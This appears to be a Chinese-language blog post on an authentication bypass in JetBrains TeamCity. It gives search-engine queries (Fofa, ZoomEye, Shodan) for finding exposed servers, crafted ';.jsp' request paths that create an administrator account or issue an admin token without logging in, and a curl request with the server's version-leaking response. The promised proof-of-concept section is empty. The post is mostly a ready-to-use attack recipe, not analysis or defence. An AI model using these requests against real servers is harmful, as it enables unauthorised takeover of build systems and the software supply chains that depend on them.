【身份验证绕过】JetBrains TeamCity

【身份验证绕过】JetBrains TeamCity

漏洞原理

向存在漏洞服务器发送一个不存在的页面请求

?jsp=/app/rest/server;.jsp

这会使服务器报错提供版本信息,且无需登录

Fofa

app=“JET_BRAINS-TeamCity”

ZoomEye

app:“JetBrains TeamCity”

Shodan

http.component:“teamcity”

创建管理员账户

通过向服务器的用户管理API发送请求,包含所需的用户名和密码

<teamcitysite>/hax?jsp=/app/rest/users;.jsp

或为自己生成管理员token,巩固权限

<teamcitysite>/hax?jsp=/app/rest/users/id:1/tokens/TokenName;.jsp

get请求

GET <teamcitysite>/hax?jsp=/app/rest/server;.jsp HTTP/1.1

服务器响应结果

 

 

C:\Users\>curl -ik http://x.x.x.x:8111/hax?jsp=/app/rest/server;.jsp

HTTP/1.1 200

TeamCity-Node-Id: MAIN_SERVER

Cache-Control: no-store

Content-Type: application/xml;charset=ISO-8859-1

Content-Language: en-IE

Content-Length: 794

Date: Wed, 14 Feb 2024 17:24:59 GMT

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><server version="2023.11.3 (build 147512)" versionMajor="2023" versionMinor="11" startTime="20240212T021131-0800" currentTime="20240214T092459-0800" buildNumber="147512" buildDate="20240129T000000-0800" internalId="cfb27466-d6d6-4bc8-a398-8b777182d653" role="main_node" webUrl="http://localhost:8111" artifactsUrl=""><projects href="/app/rest/projects"/><vcsRoots href="/app/rest/vcs-roots"/><builds href="/app/rest/builds"/><users href="/app/rest/users"/><userGroups href="/app/rest/userGroups"/><agents href="/app/rest/agents"/><buildQueue href="/app/rest/buildQueue"/><agentPools href="/app/rest/agentPools"/><investigations href="/app/rest/investigations"/><mutes href="/app/rest/mutes"/><nodes href="/app/rest/server/nodes"/></server>

漏洞复现

使用poc添加账户

 

poc利用

 

 

 

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发
头像
自古评论出人才是你吗?
提交
头像

昵称

取消
昵称表情代码

    暂无评论内容